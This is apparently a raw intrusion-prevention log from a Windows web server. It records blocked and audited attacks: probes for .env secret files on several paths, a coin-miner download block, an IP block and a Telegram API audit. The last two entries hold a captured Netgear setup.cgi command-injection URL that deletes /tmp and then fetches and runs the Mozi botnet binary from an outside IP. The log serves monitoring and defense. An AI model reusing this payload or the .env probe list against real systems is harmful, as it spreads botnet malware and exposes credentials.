0000040e	01dc941522e881c1	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414fd9c0d20	01dc9414fd9c0d20	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJGRDk4RDY0Qy05NDE0LTExRjAtQTlGMi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000c278	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/development/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040a	01dc941522e881c1	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414fe3f375c	01dc9414fe3f375c	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiJGRTNGMDBERS05NDE0LTExRjAtQTgzNy0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000c278	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/backend/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000040d	01dc9415298eba27	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc9414ffecb1db	01dc941502f84385	00000002	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIwMkY2QUE0NC05NDE1LTExRjAtQUEzMi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000de5c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/api/shared/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000413	01dc9415303895c6	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc94150a64bcf8	01dc94150a64bcf8	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIwQTYzRjg3Ny05NDE1LTExRjAtQUY0Ri0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a344	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/.env.production.local			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000406	01dc94153391fdf9	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc94150cd78ef4	01dc94150cd78ef4	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIwQ0Q0RTcwRi05NDE1LTExRjAtQUU1NS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a344	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/.env.old			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000407	01dc94153391fdf9	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc94150e311f62	01dc94150e311f62	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIwRTJERjgyNC05NDE1LTExRjAtQUVFNi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a344	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/.env.prod			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000406	01dc94153391fdf9	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc94150f12ced0	01dc94150f12ced0	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIwRjBGQUIxQS05NDE1LTExRjAtQTE0NS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a344	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/crm/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000408	01dc94153391fdf9	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc94150fb3e40a	01dc94150fb3e40a	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIwRkIwOTA5Mi05NDE1LTExRjAtQTE4OC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a344	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/local/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000407	01dc941536e2c003	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc941510c2eb9b	01dc941510c2eb9b	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIxMEMwMTgyQS05NDE1LTExRjAtQTFGQS0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a95c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/core/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000406	01dc941536e2c003	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc94151201b3ea	01dc94151201b3ea	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIxMUZGMEIyQy05NDE1LTExRjAtQTA4MC0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000a95c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://www.shopapplevn.com/web/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fb	01dc94155823e9ab	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc94153457073e	01dc94153457073e	00000001	00000170	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJhY3RvciI6eyJ1aWQiOiIwQkQ2QUY3OC0yNkI5LTRGMDktQTg2Ni0zRjE2ODY2N0Y3NUYifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6MX0sImRldGVjdGlvbl91aWQiOiIzNDUzRDAwNC05NDE1LTExRjAtOUVFNi0wMDE1NUQwNTc4MEMiLCJyZW1lZGlhdGVkIjp0cnVlLCJ0aHJlYXQiOnsiaWQiOjMyMDY2LCJuYW1lIjoiQXVkaXQ6IEVudmlyb25tZW50IENvbmZpZyBGaWxlIERvd25sb2FkIEF0dGVtcHQiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007d42	00010000	00000002	00000002	0000871d	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://patahcmc.com/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000021e	01dc941acc3720a7	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc941acb37c146	01dc941c30d87d46	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 3:06:11 PM to 2/2/2026 3:16:11 PM).
						Default	Administrator	LAKE	00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc941af0e7e550	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc941acab4af5f	01dc941acab4af5f	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQxOTU2LCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDE5NTI1NDQxLCJ1aWQiOiIzNEE0NERCRS1GRkZFLUYxRjAtQjlFQi1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiJDQUIxN0M3MC05NDFBLTExRjAtODZENC0wMDE1NUQwNTc4MEMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG05OTZmNzIxNi0yZTVkLTQ3NzUtODhjOC1mNDhhN2FlMjVkMWUgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjo0NzQ3Niwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAxOTUyNDY3NCwidWlkIjoiMzRBNDREQkItRkZGRS1GMUYwLUI5RUItRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d6e2	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770019565.8515040874481201171875			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
00000d6f	01dc941bb1b2e583	000000ce	0000000f	00000000	00000000	00000002	00000002	00000002	01dc941b8bec874f	01dc941b8bec874f	00000001	00000a8c	[SID: 33929] Audit: Untrusted Telegram API Connection attack detected but not blocked. Application path: C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE		C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwicG93ZXJzaGVsbC5leGVcIiBDOlxcVG9vbHNcXFNlcnZlcl9TY3JpcHRcXHBvb2xtb25pdG9yXFxwb29sbW9uaXRvci5wczEgLVdpbmRvd1N0eWxlIEhpZGRlbiIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTczMTQ2ODEyMjk0NSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFx3aW5kb3dzcG93ZXJzaGVsbFxcdjEuMFxcIiwibWQ1IjoiREQ2RjRCNzgxOEEyNTM4ODdCOEVBODY1MTVGNkZCN0QiLCJuYW1lIjoicG93ZXJzaGVsbC5leGUiLCJwYXRoIjoiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFx3aW5kb3dzcG93ZXJzaGVsbFxcdjEuMFxccG93ZXJzaGVsbC5leGUiLCJwcm9kdWN0X25hbWUiOiJNaWNyb3NvZnTCriBXaW5kb3dzwq4gT3BlcmF0aW5nIFN5c3RlbSIsInNoYTEiOiIzRTcyQkVGMjVBMUNEODhDNTAyNDIxRTNENTBBOEVCNEM2QkQxMjI2Iiwic2hhMiI6IjM4RjQzODQ2NDNCM0ZBMERFNzE0RDIzNjdCNzEyQzJFMEZBMUM4OUUyQ0ZEMTMxQUU2QjgzMUFEOTYyQjEwMzMiLCJzaWduYXR1cmVfY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwic2lnbmF0dXJlX2NyZWF0ZWRfZGF0ZSI6MTc1OTk3NDkzMzAwMCwic2lnbmF0dXJlX2lzc3VlciI6Ik1pY3Jvc29mdCBXaW5kb3dzIFByb2R1Y3Rpb24gUENBIDIwMTEiLCJzaWduYXR1cmVfdmFsdWUiOjEwOTk1MjA3NzQxOTksInNpZ25hdHVyZV92YWx1ZV9pZHMiOlsxLDIsMyw1LDYsMTMsMTYsMTcsMTgsMjBdLCJ2ZXJzaW9uIjoiMTAuMC4yMDM0OC4yODQ5IiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjEyNzEyLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDE5NzY2ODQ2LCJ1aWQiOiI2NUYyRkMzQS0wMDBFLUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI4QTlFMzgxQy05NDFCLTExRjEtOTA4Ri04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcc3lzdGVtMzJcXHN2Y2hvc3QuZXhlIC1rIG5ldHN2Y3MgLXAgLXMgU2NoZWR1bGUiLCJmaWxlIjp7ImNvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsImNyZWF0ZWQiOjE3NDQxNjQ3NTEzNjAsImZvbGRlciI6ImM6XFx3aW5kb3dzXFxzeXN0ZW0zMlxcIiwibWQ1IjoiRkM1NUQyMzU1QjcyRjQ1MDBDRDk5MDRGMTE4NEYwQkEiLCJuYW1lIjoic3ZjaG9zdC5leGUiLCJwYXRoIjoiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxzdmNob3N0LmV4ZSIsInByb2R1Y3RfbmFtZSI6Ik1pY3Jvc29mdMKuIFdpbmRvd3PCriBPcGVyYXRpbmcgU3lzdGVtIiwic2hhMSI6IkIyOTE3RTM0MzAxNkE3NzAzNjMyOUEyMzY4QThBRDI0MkRFRkVCMEYiLCJzaGEyIjoiRDdGMTA1NzFGNThBREJFMTIyRjYxNUI4NjlFQjQyQjA1Mjg2NzcwMTQ4MDY3Q0JGODgwNTRDMzhGMUJDQTRDNCIsInNpZ25hdHVyZV9jb21wYW55X25hbWUiOiJNaWNyb3NvZnQgQ29ycG9yYXRpb24iLCJzaWduYXR1cmVfY3JlYXRlZF9kYXRlIjoxNzQzNTczOTE3MDAwLCJzaWduYXR1cmVfaXNzdWVyIjoiTWljcm9zb2Z0IFdpbmRvd3MgUHJvZHVjdGlvbiBQQ0EgMjAxMSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUyMDc3MDEwMywic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzEsMiwzLDUsNiwxNiwxNywxOCwyMF0sInZlcnNpb24iOiIxMC4wLjIwMzQ4LjM0NTEiLCJ4YXR0cmlidXRlcyI6eyJwb3J0YWwiOmZhbHNlfX0sInBpZCI6MjM2MCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAxOTc0NTU2MywidWlkIjoiNjVGMkZBNDktMDAwRS1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzM5MjksIm5hbWUiOiJBdWRpdDogVW50cnVzdGVkIFRlbGVncmFtIEFQSSBDb25uZWN0aW9uIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		00008489	00010001	00000017	00000017	000001bb	0000c43d	01207c06e80404f00000000000000900	0624809c000000000000000000901696	Audit: Untrusted Telegram API Connection	https://api.telegram.org			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		38F4384643B3FA0DE714D2367B712C2E0FA1C89E2CFD131AE6B831AD962B1033	00000000	00000000	
00000211	01dc941ccd67d1d9	000000cf	00000007	164a8367	52c46367	00000001	00000000	00000001	01dc941ccbef1e58	01dc941e318fda58	00000001	00000000	The client will block traffic from IP address 103.99.196.82 for the next 600 seconds (from 2/2/2026 3:20:31 PM to 2/2/2026 3:30:31 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000431	01dc941cf215623a	000000ce	00000003	164a8367	52c46367	00000002	00000001	00000001	01dc941ccb6e5fdf	01dc941ccb6e5fdf	00000001	0000011c	[SID: 30764] Web Attack: Remote OS Command Injection attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNBRjE3OTRGLTk0MUMtMTFGMS05NkVBLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3NjQsIm5hbWUiOiJXZWIgQXR0YWNrOiBSZW1vdGUgT1MgQ29tbWFuZCBJbmplY3Rpb24iLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		0000782c	00010042	00000002	00000002	0000fdfb	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Remote OS Command Injection	http:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.99.196.82:39698/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000041b	01dc941cf215623a	000000ce	00000003	164a8367	52c46367	00000002	00000001	00000001	01dc941ccb70c1b8	01dc941ccb70c1b8	00000001	00000114	[SID: 33260] Attack: Malicious Scan Request 4 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNBRjE3OTRFLTk0MUMtMTFGMS05NkVBLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMyNjAsIm5hbWUiOiJBdHRhY2s6IE1hbGljaW91cyBTY2FuIFJlcXVlc3QgNCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000081ec	00010000	00000002	00000002	0000fdfb	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Attack: Malicious Scan Request 4	http:///setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.99.196.82:39698/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	